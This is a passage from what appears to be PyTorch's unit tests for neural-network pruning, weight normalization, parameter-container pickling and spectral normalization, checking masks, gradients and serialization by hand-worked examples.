# compute grad pre-pruning and check it's equal to all ones
y_prepruning.sum().backward()
old_grad_weight = m.weight.grad.clone() # don't grab pointer!
self.assertEqual(old_grad_weight, torch.ones_like(m.weight))
old_grad_bias = m.bias.grad.clone()
self.assertEqual(old_grad_bias, torch.ones_like(m.bias))
# remove grads
m.zero_grad()
# force the mask to be made of all 1s
with mock.patch(
"torch.nn.utils.prune.RandomUnstructured.compute_mask"
) as compute_mask:
compute_mask.return_value = torch.ones_like(m.weight)
prune.random_unstructured(m, name='weight', amount=0.9) # amount won't count
# with mask of 1s, output should be identical to no mask
y_postpruning = m(input_)
self.assertEqual(y_prepruning, y_postpruning)
# with mask of 1s, grad should be identical to no mask
y_postpruning.sum().backward()
self.assertEqual(old_grad_weight, m.weight_orig.grad)
self.assertEqual(old_grad_bias, m.bias.grad)
# calling forward twice in a row shouldn't change output
y1 = m(input_)
y2 = m(input_)
self.assertEqual(y1, y2)
def test_random_pruning(self):
input_ = torch.ones(1, 5)
m = nn.Linear(5, 2)
# define custom mask to assign with mock
mask = torch.ones_like(m.weight)
mask[1, 0] = 0
mask[0, 3] = 0
# check grad is zero for masked weights
with mock.patch(
"torch.nn.utils.prune.RandomUnstructured.compute_mask"
) as compute_mask:
compute_mask.return_value = mask
prune.random_unstructured(m, name='weight', amount=0.9)
y_postpruning = m(input_)
y_postpruning.sum().backward()
# weight_orig is the parameter, so it's the tensor that will accumulate the grad
self.assertEqual(m.weight_orig.grad, mask) # all 1s, except for masked units
self.assertEqual(m.bias.grad, torch.ones_like(m.bias))
# make sure that weight_orig update doesn't modify [1, 0] and [0, 3]
old_weight_orig = m.weight_orig.clone()
# update weights
learning_rate = 1.
for p in m.parameters():
p.data.sub_(p.grad.data * learning_rate)
# since these are pruned, they should not be updated
self.assertEqual(old_weight_orig[1, 0], m.weight_orig[1, 0])
self.assertEqual(old_weight_orig[0, 3], m.weight_orig[0, 3])
def test_random_pruning_forward(self):
r"""check forward with mask (by hand).
"""
input_ = torch.ones(1, 5)
m = nn.Linear(5, 2)
# define custom mask to assign with mock
mask = torch.zeros_like(m.weight)
mask[1, 0] = 1
mask[0, 3] = 1
with mock.patch(
"torch.nn.utils.prune.RandomUnstructured.compute_mask"
) as compute_mask:
compute_mask.return_value = mask
prune.random_unstructured(m, name='weight', amount=0.9)
yhat = m(input_)
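            # with an all-ones input and a single surviving weight per output
            # unit, each output is just that weight plus the corresponding bias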
self.assertEqual(yhat[0, 0], m.weight_orig[0, 3] + m.bias[0])
self.assertEqual(yhat[0, 1], m.weight_orig[1, 0] + m.bias[1])
def test_remove_pruning_forward(self):
r"""Remove pruning and check forward is unchanged from previous
pruned state.
"""
input_ = torch.ones(1, 5)
m = nn.Linear(5, 2)
# define custom mask to assign with mock
mask = torch.ones_like(m.weight)
mask[1, 0] = 0
mask[0, 3] = 0
# check grad is zero for masked weights
with mock.patch(
"torch.nn.utils.prune.RandomUnstructured.compute_mask"
) as compute_mask:
compute_mask.return_value = mask
prune.random_unstructured(m, name='weight', amount=0.9)
y_postpruning = m(input_)
prune.remove(m, 'weight')
y_postremoval = m(input_)
self.assertEqual(y_postpruning, y_postremoval)
def test_pruning_id_consistency(self):
r"""Test that pruning doesn't change the id of the parameters, which
would otherwise introduce issues with pre-existing optimizers that
point to old parameters.
"""
m = nn.Linear(5, 2, bias=False)
tensor_id = id(list(m.parameters())[0])
prune.random_unstructured(m, name="weight", amount=0.9)
self.assertEqual(tensor_id, id(list(m.parameters())[0]))
prune.remove(m, "weight")
self.assertEqual(tensor_id, id(list(m.parameters())[0]))
def test_random_pruning_pickle(self):
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
prune.random_unstructured(m, name=name, amount=0.1)
m_new = pickle.loads(pickle.dumps(m))
self.assertIsInstance(m_new, type(m))
def test_multiple_pruning_calls(self):
# if you call pruning twice, the hook becomes a PruningContainer
m = nn.Conv3d(2, 2, 2)
prune.l1_unstructured(m, name='weight', amount=0.1)
weight_mask0 = m.weight_mask # save it for later sanity check
# prune again
prune.ln_structured(m, name='weight', amount=0.3, n=2, dim=0)
hook = next(iter(m._forward_pre_hooks.values()))
self.assertIsInstance(
hook,
torch.nn.utils.prune.PruningContainer
)
# check that container._tensor_name is correctly set no matter how
# many pruning methods are in the container
self.assertEqual(hook._tensor_name, 'weight')
# check that the pruning container has the right length
# equal to the number of pruning iters
self.assertEqual(len(hook), 2) # m.weight has been pruned twice
# check that the entries of the pruning container are of the expected
# type and in the expected order
self.assertIsInstance(hook[0], torch.nn.utils.prune.L1Unstructured)
self.assertIsInstance(hook[1], torch.nn.utils.prune.LnStructured)
# check that all entries that are 0 in the 1st mask are 0 in the
# 2nd mask too
self.assertTrue(torch.all(m.weight_mask[weight_mask0 == 0] == 0))
# prune again
prune.ln_structured(m, name='weight', amount=0.1, n=float('inf'), dim=1)
# check that container._tensor_name is correctly set no matter how
# many pruning methods are in the container
hook = next(iter(m._forward_pre_hooks.values()))
self.assertEqual(hook._tensor_name, 'weight')
def test_pruning_container(self):
# create an empty container
container = prune.PruningContainer()
container._tensor_name = 'test'
self.assertEqual(len(container), 0)
p = prune.L1Unstructured(amount=2)
p._tensor_name = 'test'
# test adding a pruning method to a container
container.add_pruning_method(p)
# test error raised if tensor name is different
q = prune.L1Unstructured(amount=2)
q._tensor_name = 'another_test'
with self.assertRaises(ValueError):
container.add_pruning_method(q)
# test that adding a non-pruning method object to a pruning container
# raises a TypeError
with self.assertRaises(TypeError):
container.add_pruning_method(10)
with self.assertRaises(TypeError):
container.add_pruning_method('ugh')
def test_pruning_container_compute_mask(self):
r"""Test `compute_mask` of pruning container with a known `t` and
`default_mask`. Indirectly checks that Ln structured pruning is
acting on the right axis.
"""
# create an empty container
container = prune.PruningContainer()
container._tensor_name = 'test'
# 1) test unstructured pruning
# create a new pruning method
p = prune.L1Unstructured(amount=2)
p._tensor_name = 'test'
# add the pruning method to the container
container.add_pruning_method(p)
# create tensor to be pruned
t = torch.tensor([[1, 2, 3, 4], [5, 6, 7, 8]]).to(dtype=torch.float32)
# create prior mask by hand
default_mask = torch.tensor([[1, 1, 1, 0], [1, 1, 0, 1]])
# since we are pruning the two lowest magnitude units, the outcome of
# the calculation should be this:
expected_mask = torch.tensor([[0, 0, 1, 0], [1, 1, 0, 1]])
computed_mask = container.compute_mask(t, default_mask)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected_mask, computed_mask)
# 2) test structured pruning
q = prune.LnStructured(amount=1, n=2, dim=0)
q._tensor_name = 'test'
container.add_pruning_method(q)
# since we are pruning the lowest magnitude one of the two rows, the
# outcome of the calculation should be this:
expected_mask = torch.tensor([[0, 0, 0, 0], [1, 1, 0, 1]])
computed_mask = container.compute_mask(t, default_mask)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected_mask, computed_mask)
        # 3) test structured pruning along another axis
r = prune.LnStructured(amount=1, n=2, dim=1)
r._tensor_name = 'test'
container.add_pruning_method(r)
# since we are pruning the lowest magnitude of the four columns, the
# outcome of the calculation should be this:
expected_mask = torch.tensor([[0, 1, 1, 0], [0, 1, 0, 1]])
computed_mask = container.compute_mask(t, default_mask)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected_mask, computed_mask)
def test_l1_unstructured_pruning(self):
r"""Test that l1 unstructured pruning actually removes the lowest
entries by l1 norm (by hand). It also checks that applying l1
unstructured pruning more than once respects the previous mask.
"""
m = nn.Linear(4, 2)
# modify its weight matrix by hand
m.weight = torch.nn.Parameter(
torch.tensor(
[[1, 2, 3, 4], [-4, -3, -2, -1]], dtype=torch.float32
)
)
prune.l1_unstructured(m, 'weight', amount=2)
expected_weight = torch.tensor([[0, 2, 3, 4], [-4, -3, -2, 0]],
dtype=m.weight.dtype)
self.assertEqual(expected_weight, m.weight)
# check that pruning again removes the next two smallest entries
prune.l1_unstructured(m, 'weight', amount=2)
expected_weight = torch.tensor([[0, 0, 3, 4], [-4, -3, 0, 0]],
dtype=m.weight.dtype)
self.assertEqual(expected_weight, m.weight)
def test_l1_unstructured_pruning_with_importance_scores(self):
r"""Test that l1 unstructured pruning actually removes the lowest
entries of importance scores and not the parameter by l1 norm (by hand).
It also checks that applying l1 unstructured pruning more than once
respects the previous mask.
"""
m = nn.Linear(4, 2)
# modify its weight matrix by hand
m.weight = torch.nn.Parameter(
torch.tensor(
[[1, 2, 3, 4], [-4, -3, -2, -1]], dtype=torch.float32
)
)
importance_scores = torch.tensor(
[[4, 2, 1, 3], [-3, -1, -2, -4]], dtype=torch.float32
)
prune.l1_unstructured(m, 'weight', amount=2, importance_scores=importance_scores)
expected_weight = torch.tensor([[1, 2, 0, 4], [-4, 0, -2, -1]],
dtype=m.weight.dtype)
self.assertEqual(expected_weight, m.weight)
# check that pruning again removes two entries of m.weight that are colocated with
# the next two smallest absolute values of importance scores.
prune.l1_unstructured(m, 'weight', amount=2, importance_scores=importance_scores)
expected_weight = torch.tensor([[1, 0, 0, 4], [-4, 0, 0, -1]],
dtype=m.weight.dtype)
self.assertEqual(expected_weight, m.weight)
def test_unstructured_pruning_same_magnitude(self):
r"""Since it may happen that the tensor to prune has entries with the
same exact magnitude, it is important to check that pruning happens
        consistently based on the bottom % of weights, and not by threshold,
which would instead kill off *all* units with magnitude = threshold.
"""
AMOUNT = 0.2
p = prune.L1Unstructured(amount=AMOUNT)
        # create a random tensor with entries in {-2, 0, 2}
t = 2 * torch.randint(low=-1, high=2, size=(10, 7))
nparams_toprune = prune._compute_nparams_toprune(AMOUNT, t.nelement())
computed_mask = p.compute_mask(t, default_mask=torch.ones_like(t))
nparams_pruned = torch.sum(computed_mask == 0)
self.assertEqual(nparams_toprune, nparams_pruned)
def test_random_structured_pruning_amount(self):
AMOUNT = 0.6
AXIS = 2
p = prune.RandomStructured(amount=AMOUNT, dim=AXIS)
t = 2 * torch.randint(low=-1, high=2, size=(5, 4, 2)).to(
dtype=torch.float32
)
nparams_toprune = prune._compute_nparams_toprune(AMOUNT, t.shape[AXIS])
computed_mask = p.compute_mask(t, default_mask=torch.ones_like(t))
        # check that 1 column is fully pruned and the others are left untouched
remaining_axes = [_ for _ in range(len(t.shape)) if _ != AXIS]
per_column_sums = sorted(
torch.sum(computed_mask == 0, axis=remaining_axes)
)
assert per_column_sums == [0, 20]
def test_ln_structured_pruning(self):
r"""Check Ln structured pruning by hand.
"""
m = nn.Conv2d(3, 1, 2)
m.weight.data = torch.tensor(
[[[[1., 2.], [1., 2.5]],
[[0.5, 1.], [0.1, 0.1]],
[[-3., -5.], [0.1, -1.]]]]
)
# expected effect of pruning 1 of the 3 channels by L2-norm
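        # channel 1 has the smallest L2 norm (~1.13, vs 3.5 and ~5.92), so it
        # is the one that gets masked out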
expected_mask_axis1 = torch.ones_like(m.weight)
expected_mask_axis1[:, 1] = 0.
prune.ln_structured(m, 'weight', amount=1, n=2, dim=1)
self.assertEqual(expected_mask_axis1, m.weight_mask)
# expected effect of pruning 1 of the 2 columns along axis -1 by L1-norm
expected_mask_axis3 = expected_mask_axis1
expected_mask_axis3[:, :, :, 0] = 0.
prune.ln_structured(m, 'weight', amount=1, n=1, dim=-1)
self.assertEqual(expected_mask_axis3, m.weight_mask)
def test_ln_structured_pruning_importance_scores(self):
r"""Check Ln structured pruning by hand.
"""
m = nn.Conv2d(3, 1, 2)
m.weight.data = torch.tensor(
[[[[1., 2.], [1., 2.5]],
[[0.5, 1.], [0.1, 0.1]],
[[-3., -5.], [0.1, -1.]]]]
)
importance_scores = torch.tensor(
[[[[10., 1.], [10., 1.]],
[[30., 3.], [30., 3.]],
[[-20., -2.], [-20., -2.]]]]
)
        # expected effect of pruning 1 of the 3 channels by L2-norm of the importance scores
expected_mask_axis1 = torch.ones_like(m.weight)
expected_mask_axis1[:, 0] = 0.
prune.ln_structured(m, 'weight', amount=1, n=2, dim=1, importance_scores=importance_scores)
self.assertEqual(expected_mask_axis1, m.weight_mask)
        # expected effect of pruning 1 of the 2 columns along axis -1 by L1-norm of the importance scores
expected_mask_axis3 = expected_mask_axis1
expected_mask_axis3[:, :, :, 1] = 0.
prune.ln_structured(m, 'weight', amount=1, n=1, dim=-1, importance_scores=importance_scores)
self.assertEqual(expected_mask_axis3, m.weight_mask)
def test_remove_pruning(self):
r"""`prune.remove` removes the hook and the reparametrization
and makes the pruning final in the original parameter.
"""
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
# first prune
prune.random_unstructured(m, name, amount=0.5)
self.assertIn(name + "_orig", dict(m.named_parameters()))
self.assertIn(name + "_mask", dict(m.named_buffers()))
self.assertNotIn(name, dict(m.named_parameters()))
self.assertTrue(hasattr(m, name))
pruned_t = getattr(m, name)
# then remove pruning
prune.remove(m, name)
self.assertIn(name, dict(m.named_parameters()))
self.assertNotIn(name + "_orig", dict(m.named_parameters()))
self.assertNotIn(name + "_mask", dict(m.named_buffers()))
final_t = getattr(m, name)
self.assertEqual(pruned_t, final_t)
def test_remove_pruning_exception(self):
r"""Removing from an unpruned tensor throws an assertion error
"""
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
# check that the module isn't pruned
self.assertFalse(prune.is_pruned(m))
# since it isn't pruned, pruning can't be removed from it
with self.assertRaises(ValueError):
prune.remove(m, name)
def test_global_pruning(self):
r"""Test that global l1 unstructured pruning over 2 parameters removes
the `amount=4` smallest global weights across the 2 parameters.
"""
m = nn.Linear(4, 2)
n = nn.Linear(3, 1)
# modify the weight matrices by hand
m.weight = torch.nn.Parameter(
torch.tensor([[1, 2, 3, 4], [-4, -3, -2, -1]]).to(
dtype=torch.float32)
)
n.weight = torch.nn.Parameter(
torch.tensor([[0, 0.1, -2]]).to(
dtype=torch.float32)
)
params_to_prune = (
(m, 'weight'),
(n, 'weight'),
)
# prune the 4 smallest weights globally by L1 magnitude
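        # those are |0| and |0.1| in n.weight plus |1| and |-1| in m.weight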
prune.global_unstructured(
params_to_prune,
pruning_method=prune.L1Unstructured,
amount=4
)
expected_mweight = torch.tensor([[0, 2, 3, 4], [-4, -3, -2, 0]],
dtype=m.weight.dtype)
self.assertEqual(expected_mweight, m.weight)
expected_nweight = torch.tensor([[0, 0, -2]]).to(dtype=n.weight.dtype)
self.assertEqual(expected_nweight, n.weight)
def test_global_pruning_importance_scores(self):
r"""Test that global l1 unstructured pruning over 2 parameters removes
the `amount=4` smallest global weights across the 2 parameters.
"""
m = nn.Linear(4, 2)
n = nn.Linear(3, 1)
# modify the weight matrices by hand
m.weight = torch.nn.Parameter(
torch.tensor([[1, 2, 3, 4], [-4, -3, -2, -1]]).to(
dtype=torch.float32)
)
m_importance_scores = torch.tensor(
[[4, 2, 1, 3], [-3, -1, -2, -4]], dtype=torch.float32
)
n.weight = torch.nn.Parameter(
torch.tensor([[0, 0.1, -2]]).to(
dtype=torch.float32)
)
n_importance_scores = torch.tensor([[0, 10., -0.2]]).to(dtype=torch.float32)
params_to_prune = (
(m, 'weight'),
(n, 'weight'),
)
importance_scores = {
(m, 'weight'): m_importance_scores,
(n, 'weight'): n_importance_scores,
}
        # prune the 4 weights with the globally smallest importance scores
prune.global_unstructured(
params_to_prune,
pruning_method=prune.L1Unstructured,
amount=4,
importance_scores=importance_scores,
)
expected_m_weight = torch.tensor([[1, 2, 0, 4], [-4, 0, -2, -1]],
dtype=m.weight.dtype)
self.assertEqual(expected_m_weight, m.weight)
expected_n_weight = torch.tensor([[0, 0.1, 0]]).to(dtype=n.weight.dtype)
self.assertEqual(expected_n_weight, n.weight)
def test_custom_from_mask_pruning(self):
r"""Test that the CustomFromMask is capable of receiving
as input at instantiation time a custom mask, and combining it with
the previous default mask to generate the correct final mask.
"""
# new mask
mask = torch.tensor([[0, 1, 1, 0], [0, 0, 1, 1]])
# old mask
default_mask = torch.tensor([[0, 0, 0, 0], [1, 1, 1, 1]])
# some tensor (not actually used)
t = torch.rand_like(mask.to(dtype=torch.float32))
p = prune.CustomFromMask(mask=mask)
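        # the final mask is the elementwise product (a logical AND) of the
        # custom mask and the default mask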
computed_mask = p.compute_mask(t, default_mask)
expected_mask = torch.tensor([[0, 0, 0, 0], [0, 0, 1, 1]]).to(
dtype=t.dtype
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(computed_mask, expected_mask)
def test_pruning_rollback(self):
r"""Test that if something fails when the we try to compute the mask,
then the model isn't left in some intermediate half-pruned state.
The try/except statement in `apply` should handle rolling back
to the previous state before pruning began.
"""
modules = [nn.Linear(5, 7), nn.Conv3d(2, 2, 2)]
names = ['weight', 'bias']
for m in modules:
for name in names:
with self.subTest(m=m, name=name):
with mock.patch(
"torch.nn.utils.prune.L1Unstructured.compute_mask"
) as compute_mask:
compute_mask.side_effect = Exception('HA!')
with self.assertRaises(Exception):
prune.l1_unstructured(m, name=name, amount=0.9)
self.assertTrue(
name in dict(m.named_parameters())
)
self.assertFalse(
name + '_mask' in dict(m.named_buffers())
)
self.assertFalse(
name + '_orig' in dict(m.named_parameters())
)
def test_pruning_serialization_model(self):
# create a model
model = torch.nn.Sequential(
torch.nn.Linear(10, 10),
torch.nn.ReLU(),
torch.nn.Linear(10, 1),
)
# check that everything looks normal before pruning
self.assertNotIn('0.weight_orig', model.state_dict())
self.assertNotIn('0.weight_mask', model.state_dict())
self.assertIn('0.weight', model.state_dict())
# prune one of its parameters
prune.l1_unstructured(module=model[0], name='weight', amount=0.9)
# check that the original weight and the new mask are present
self.assertIn('0.weight_orig', model.state_dict())
self.assertIn('0.weight_mask', model.state_dict())
self.assertNotIn('0.weight', model.state_dict())
self.assertTrue(hasattr(model[0], 'weight'))
pruned_weight = model[0].weight
with TemporaryFileName() as fname:
torch.save(model, fname)
new_model = torch.load(fname)
# check that the original weight and the new mask are present
self.assertIn('0.weight_orig', new_model.state_dict())
self.assertIn('0.weight_mask', new_model.state_dict())
self.assertNotIn('0.weight', new_model.state_dict())
self.assertTrue(hasattr(new_model[0], 'weight'))
self.assertEqual(pruned_weight, new_model[0].weight)
def test_pruning_serialization_state_dict(self):
# create a model
model = torch.nn.Sequential(
torch.nn.Linear(10, 10),
torch.nn.ReLU(),
torch.nn.Linear(10, 1),
)
# check that everything looks normal before pruning
self.assertNotIn('0.weight_orig', model.state_dict())
self.assertNotIn('0.weight_mask', model.state_dict())
self.assertIn('0.weight', model.state_dict())
# prune one of its parameters
prune.l1_unstructured(module=model[0], name='weight', amount=0.9)
# check that the original weight and the new mask are present
self.assertIn('0.weight_orig', model.state_dict())
self.assertIn('0.weight_mask', model.state_dict())
self.assertNotIn('0.weight', model.state_dict())
self.assertTrue(hasattr(model[0], 'weight'))
pruned_weight = model[0].weight
# make pruning permanent and restore parameter names as in base
# architecture
prune.remove(module=model[0], name='weight')
# check that the original weight and the new mask are no longer present
self.assertNotIn('0.weight_orig', model.state_dict())
self.assertNotIn('0.weight_mask', model.state_dict())
self.assertIn('0.weight', model.state_dict())
# save the state dict of model and reload it into new_model
new_model = torch.nn.Sequential(
torch.nn.Linear(10, 10),
torch.nn.ReLU(),
torch.nn.Linear(10, 1),
)
with TemporaryFileName() as fname:
torch.save(model.state_dict(), fname)
new_model.load_state_dict(torch.load(fname))
# check that the original weight and the new mask are not present in
# new_model either.
self.assertNotIn('0.weight_orig', new_model.state_dict())
self.assertNotIn('0.weight_mask', new_model.state_dict())
self.assertIn('0.weight', new_model.state_dict())
self.assertEqual(pruned_weight, new_model[0].weight)
def test_prune(self):
# create a new pruning method
p = prune.L1Unstructured(amount=2)
# create tensor to be pruned
t = torch.tensor([[1, 2, 3, 4], [5, 6, 7, 8]]).to(dtype=torch.float32)
# create prior mask by hand
default_mask = torch.tensor([[1, 1, 1, 0], [1, 1, 0, 1]])
# since we are pruning the two lowest magnitude units, the outcome of
# the calculation should be this:
expected_mask = torch.tensor([[0, 0, 1, 0], [1, 1, 0, 1]])
pruned_tensor = p.prune(t, default_mask)
self.assertEqual(t * expected_mask, pruned_tensor)
def test_prune_importance_scores(self):
# create a new pruning method
p = prune.L1Unstructured(amount=2)
# create tensor to be pruned
t = torch.tensor([[1, 2, 3, 4], [5, 6, 7, 8]]).to(dtype=torch.float32)
importance_scores = torch.tensor(
[[1, 2, 3, 4], [1.5, 1.6, 1.7, 1.8]]
).to(dtype=torch.float32)
# create prior mask by hand
default_mask = torch.tensor([[1, 1, 1, 0], [1, 1, 0, 1]])
        # since we are pruning the two units with the lowest importance scores,
        # the outcome of the calculation should be this:
expected_mask = torch.tensor([[0, 1, 1, 0], [0, 1, 0, 1]])
pruned_tensor = p.prune(t, default_mask, importance_scores=importance_scores)
self.assertEqual(t * expected_mask, pruned_tensor)
def test_prune_importance_scores_mimic_default(self):
# create a new pruning method
p = prune.L1Unstructured(amount=2)
# create tensor to be pruned
t = torch.tensor([[1, 2, 3, 4], [5, 6, 7, 8]]).to(dtype=torch.float32)
# create prior mask by hand
default_mask = torch.tensor([[1, 1, 1, 0], [1, 1, 0, 1]])
# since we are pruning the two lowest magnitude units, the outcome of
# the calculation should be this:
expected_mask = torch.tensor([[0, 0, 1, 0], [1, 1, 0, 1]])
pruned_tensor_without_importance_scores = p.prune(t, default_mask)
pruned_tensor_with_importance_scores = p.prune(t, default_mask, importance_scores=t)
self.assertEqual(pruned_tensor_without_importance_scores, pruned_tensor_with_importance_scores)
self.assertEqual(t * expected_mask, pruned_tensor_without_importance_scores)
def test_rnn_pruning(self):
l = torch.nn.LSTM(32, 32)
# This Module has 4 parameters called:
# 'weight_ih_l0', 'weight_hh_l0', 'bias_ih_l0', 'bias_hh_l0'
# Pruning one of them causes one of the weights to become a tensor
prune.l1_unstructured(l, 'weight_ih_l0', 0.5)
assert (
sum([isinstance(p, torch.nn.Parameter) for p in l._flat_weights])
== 3
)
# Removing the pruning reparametrization restores the Parameter
prune.remove(l, 'weight_ih_l0')
assert (
sum([isinstance(p, torch.nn.Parameter) for p in l._flat_weights])
== 4
)
# Make sure that, upon removal of the reparametrization, the
# `._parameters` and `.named_parameters` contain the right params.
# Specifically, the original weight ('weight_ih_l0') should be placed
# back in the parameters, while the reparametrization component
# ('weight_ih_l0_orig') should be removed.
assert 'weight_ih_l0' in l._parameters
assert l._parameters['weight_ih_l0'] is not None
assert 'weight_ih_l0_orig' not in l._parameters
assert 'weight_ih_l0' in dict(l.named_parameters())
assert dict(l.named_parameters())['weight_ih_l0'] is not None
assert 'weight_ih_l0_orig' not in dict(l.named_parameters())
def test_rnn_weight_norm(self):
def check_weight_norm(l, name, num_params):
# This Module has 4 or 5 parameters called:
            # 'weight_ih_l0', 'weight_hh_l0', 'bias_ih_l0', 'bias_hh_l0', 'weight_hr_l0'
# Applying weight norm on one of them causes it to become a tensor
l = torch.nn.utils.weight_norm(l, name=name)
self.assertEqual(
sum([isinstance(p, torch.nn.Parameter) for p in l._flat_weights]),
num_params - 1,
)
# Removing the weight norm reparametrization restores the Parameter
l = torch.nn.utils.remove_weight_norm(l, name=name)
self.assertEqual(
sum([isinstance(p, torch.nn.Parameter) for p in l._flat_weights]),
num_params,
)
# Make sure that, upon removal of the reparametrization, the
# `._parameters` and `.named_parameters` contain the right params.
# Specifically, the original weight ('weight_ih_l0') should be placed
# back in the parameters, while the reparametrization components
# ('weight_ih_l0_v' and 'weight_ih_l0_g') should be removed.
self.assertTrue(name in l._parameters)
self.assertIsNotNone(l._parameters[name])
self.assertTrue(name + '_v' not in l._parameters)
self.assertTrue(name + '_g' not in l._parameters)
self.assertTrue(name in dict(l.named_parameters()))
self.assertIsNotNone(dict(l.named_parameters())[name])
self.assertTrue(name + '_v' not in dict(l.named_parameters()))
self.assertTrue(name + '_g' not in dict(l.named_parameters()))
check_weight_norm(torch.nn.LSTM(32, 32), 'weight_ih_l0', 4)
check_weight_norm(torch.nn.LSTM(32, 32, proj_size=16), 'weight_hr_l0', 5)
def test_weight_norm(self):
input = torch.randn(3, 5)
m = nn.Linear(5, 7)
expected_output = m(input)
# add weight normalization
m = torch.nn.utils.weight_norm(m)
self.assertEqual(m.weight_v.size(), m.weight.size())
self.assertEqual(m.weight_g.size(), (7, 1))
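        # with the default dim=0, weight = g * v / ||v|| with one magnitude
        # entry per output row, hence g has shape (out_features, 1)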
self.assertEqual(m(input), expected_output)
# remove weight norm
m = torch.nn.utils.remove_weight_norm(m)
self.assertFalse(hasattr(m, 'weight_g'))
self.assertFalse(hasattr(m, 'weight_v'))
self.assertEqual(m(input), expected_output)
# test with dim=1
m = torch.nn.utils.weight_norm(m, dim=1)
self.assertEqual(m.weight_v.size(), m.weight.size())
self.assertEqual(m.weight_g.size(), (1, 5))
self.assertEqual(m(input), expected_output)
# test with dim=None
m = nn.Linear(5, 7)
expected_output = m(input)
m = torch.nn.utils.weight_norm(m, dim=None)
self.assertEqual(m(input), expected_output)
with self.assertRaisesRegex(RuntimeError, 'register two weight_norm hooks'):
m = torch.nn.utils.weight_norm(m)
m = torch.nn.utils.weight_norm(m)
def test_parameterlistdict_setting_attributes(self):
with warnings.catch_warnings(record=True) as w:
mod = nn.ParameterList(map(nn.Parameter, [torch.rand(2), torch.rand(2)]))
self.assertTrue(len(w) == 0)
with warnings.catch_warnings(record=True) as w:
mod.train()
mod.eval()
self.assertTrue(len(w) == 0)
with self.assertWarnsRegex(UserWarning,
r"Setting attributes on ParameterList is not supported"):
torch.nn.utils.weight_norm(mod, "0")
with warnings.catch_warnings(record=True) as w:
mod = nn.ParameterDict({"a": nn.Parameter(torch.rand(2)), "b": nn.Parameter(torch.rand(2))})
self.assertTrue(len(w) == 0)
with warnings.catch_warnings(record=True) as w:
mod.train()
mod.eval()
self.assertTrue(len(w) == 0)
with self.assertWarnsRegex(UserWarning,
r"Setting attributes on ParameterDict is not supported"):
torch.nn.utils.weight_norm(mod, "b")
def test_parameterlistdict_pickle(self):
m = nn.ParameterList(map(nn.Parameter, [torch.rand(2), torch.rand(2)]))
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
m = nn.ParameterList(map(nn.Parameter, [torch.rand(2), torch.rand(2)]))
del m._initialized
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
# Test whether loading from older checkpoints works without triggering warnings
m = nn.ParameterList(map(nn.Parameter, [torch.rand(2), torch.rand(2)]))
del m._forward_pre_hooks, m._state_dict_hooks, m._load_state_dict_pre_hooks, m._non_persistent_buffers_set
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
m = nn.ParameterDict({"a": nn.Parameter(torch.rand(2)), "b": nn.Parameter(torch.rand(2))})
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
m = nn.ParameterDict({"a": nn.Parameter(torch.rand(2)), "b": nn.Parameter(torch.rand(2))})
del m._initialized
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
# Test whether loading from older checkpoints works without triggering warnings
m = nn.ParameterDict({"a": nn.Parameter(torch.rand(2)), "b": nn.Parameter(torch.rand(2))})
del m._forward_pre_hooks, m._state_dict_hooks, m._load_state_dict_pre_hooks, m._non_persistent_buffers_set
with warnings.catch_warnings(record=True) as w:
m = pickle.loads(pickle.dumps(m))
self.assertTrue(len(w) == 0)
def test_weight_norm_pickle(self):
m = torch.nn.utils.weight_norm(nn.Linear(5, 7))
m = pickle.loads(pickle.dumps(m))
self.assertIsInstance(m, nn.Linear)
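# spectral_norm divides the weight by an estimate of its largest singular
# value, maintained by power iteration: `weight_u` and `weight_v` are buffers
# that get one update per forward pass while the module is in training mode.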
def test_spectral_norm(self):
input = torch.randn(3, 5)
m = nn.Linear(5, 7)
m = torch.nn.utils.spectral_norm(m)
self.assertEqual(m.weight_u.size(), torch.Size([m.weight.size(0)]))
# weight_orig should be trainable
self.assertTrue(hasattr(m, 'weight_orig'))
self.assertTrue('weight_orig' in m._parameters)
# weight_u should be just a reused buffer
self.assertTrue(hasattr(m, 'weight_u'))
self.assertTrue('weight_u' in m._buffers)
self.assertTrue('weight_v' in m._buffers)
# weight should be a plain attribute, not counted as a buffer or a param
self.assertFalse('weight' in m._buffers)
self.assertFalse('weight' in m._parameters)
# it should also be sharing storage with `weight_orig`
self.assertEqual(m.weight_orig.storage(), m.weight.storage())
self.assertEqual(m.weight_orig.size(), m.weight.size())
self.assertEqual(m.weight_orig.stride(), m.weight.stride())
m = torch.nn.utils.remove_spectral_norm(m)
self.assertFalse(hasattr(m, 'weight_orig'))
self.assertFalse(hasattr(m, 'weight_u'))
# weight should be converted back as a parameter
self.assertTrue(hasattr(m, 'weight'))
self.assertTrue('weight' in m._parameters)
with self.assertRaisesRegex(RuntimeError, 'register two spectral_norm hooks'):
m = torch.nn.utils.spectral_norm(m)
m = torch.nn.utils.spectral_norm(m)
# test correctness in training/eval modes and cpu/multi-gpu settings
for apply_dp in (True, False):
if apply_dp:
if not TEST_MULTIGPU:
continue
device = torch.device('cuda:0')
def maybe_wrap(m):
return torch.nn.DataParallel(m, [0, 1])
else:
device = torch.device('cpu')
def maybe_wrap(m):
return m
for requires_grad in (True, False):
m = nn.Linear(3, 4).to(device)
m.weight.requires_grad_(requires_grad)
m = torch.nn.utils.spectral_norm(m)
wrapped_m = maybe_wrap(m)
self.assertTrue(hasattr(m, 'weight_u'))
u0 = m.weight_u.clone()
